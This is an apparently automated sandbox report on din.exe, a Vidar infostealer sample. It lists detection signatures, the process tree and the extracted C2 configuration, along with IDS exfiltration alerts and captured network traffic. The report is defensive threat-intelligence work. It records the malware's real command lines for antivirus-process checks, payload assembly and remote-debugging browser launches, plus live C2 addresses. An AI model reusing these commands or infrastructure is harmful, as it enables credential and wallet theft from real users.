Windows Analysis Report
din.exe

Overview

General Information

Sample name: din.exe
Analysis ID: 1581179
MD5: ce76b7cda29a7ea80917e5844a7fca42
SHA1: c9a7eeb65056f6743b3a43ca0a7010743003191f
SHA256: 88bced6d92559b9ea1974fd4329868e68c104eb58a976d65b9df8af32bbd2400
Tags: exe, Vidar, user-lontze7

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • din.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\din.exe" MD5: CE76B7CDA29A7EA80917E5844A7FCA42)
    • cmd.exe (PID: 6116 cmdline: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2892 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3744 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6080 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6456 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1292 cmdline: cmd /c md 322891 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1292 cmdline: findstr /V "cache" Bulgaria MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7228 cmdline: cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Centered.com (PID: 7244 cmdline: Centered.com I MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 4484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • choice.exe (PID: 7260 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 2028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6912 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
16.2.Centered.com.49c0000.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
16.2.Centered.com.49c0000.2.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io | (listed below)
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                System Summary

                Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Centered.com I, ParentImage: C:\Users\user\AppData\Local\Temp\322891\Centered.com, ParentProcessId: 7244, ParentProcessName: Centered.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7736, ProcessName: chrome.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\din.exe", ParentImage: C:\Users\user\Desktop\din.exe, ParentProcessId: 7020, ParentProcessName: din.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, ProcessId: 6116, ProcessName: cmd.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started, Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6116, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6456, ProcessName: findstr.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-27T07:10:03.389881+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.7 | 49781 | TCP
                2024-12-27T07:10:06.124264+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.7 | 49782 | TCP
                2024-12-27T07:10:06.124006+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.7 | 49782 | 188.245.216.205 | 443 | TCP
                2024-12-27T07:09:58.205436+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49771 | 188.245.216.205 | 443 | TCP

                AV Detection

                Source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: din.exe, Virustotal: Detection: 22%
                Source: din.exe, ReversingLabs: Detection: 55%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.0% probability
                Source: din.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49760 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.7:49766 version: TLS 1.2
                Source: din.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: Binary string: cryptosetup.pdb source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: C:\Users\user\Desktop\din.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\din.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F6DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6DC54
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F7A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A087
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F7A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A1E2
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F6E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00F6E472
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F7A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00F7A570
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F766DC FindFirstFileW,FindNextFileW,FindClose,16_2_00F766DC
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F3C622 FindFirstFileExW,16_2_00F3C622
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00F773D4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F77333 FindFirstFileW,FindClose,16_2_00F77333
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F6D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6D921
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user~1\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user~1\AppData\Local\Temp\322891
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user~1\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user~1\AppData\Local\Temp\322891\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user~1\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user~1\AppData\
                Source: chrome.exe, Memory has grown: Private usage: 8MB later: 30MB

                Networking

                Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.7:49771 -> 188.245.216.205:443
                Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.7:49782 -> 188.245.216.205:443
                Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.7:49781
                Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.7:49782
                Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 149.154.167.99
                Source: Joe Sandbox View, IP Address: 18.238.49.74
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown, TCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknown, TCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknown, TCP traffic detected without corresponding DNS query: 217.20.58.101
                Source: unknown, TCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknown, TCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com, Code function: 16_2_00F7D889 InternetReadFile,SetEvent,GetLastError,SetEvent,16_2_00F7D889
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /b?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=10344ddb4a73bf8506bf1b41735279840; XID=10344ddb4a73bf8506bf1b41735279840
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA9C2839891B4BAE9B46E9232B945869&MUID=309DCA2A26BF68F127E0DF4827176945 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; SM=T
                Source: 5f773af2-be2b-479c-9373-554487c7dec0.tmp.28.dr | String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
